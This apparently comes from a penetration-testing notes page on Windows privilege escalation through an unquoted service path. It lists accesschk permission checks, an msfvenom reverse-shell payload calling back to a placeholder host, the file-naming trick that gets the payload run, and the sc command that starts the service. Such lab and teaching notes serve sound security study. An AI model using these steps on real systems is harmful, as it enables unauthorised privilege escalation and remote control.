Unquoted Service Path

If there is space between the path and it is not enclosed in double quotes then we can exploit it.

C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe

Here the execution will take place like: Program.exe Files.exe Program Files Unquoted.exe Path.exe etc

#Check if we have permissions to start the service:
accesschk /accepteula -ucqv user unquoted

#Check for write permissions in each directory:
accesschk /accepteula -uwdq C:\
accesschk /accepteula -uwdq "C:\Program Files\"
accesschk /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"

#Create a reverse shell file
msfvenom -p windows/shell_reverse_tcp LHOST=ip LPORT=4444 -f exe -o Common.exe
#We used common.exe name because there is directory Common Files and as there are no quotes, it will execute Common.exe first.
#Start the listener and start the service
sc start unquotedsvc
#You will get shell

PreviousInstalled Apps NextBinary Paths

Last updated 4 years ago

Was this helpful?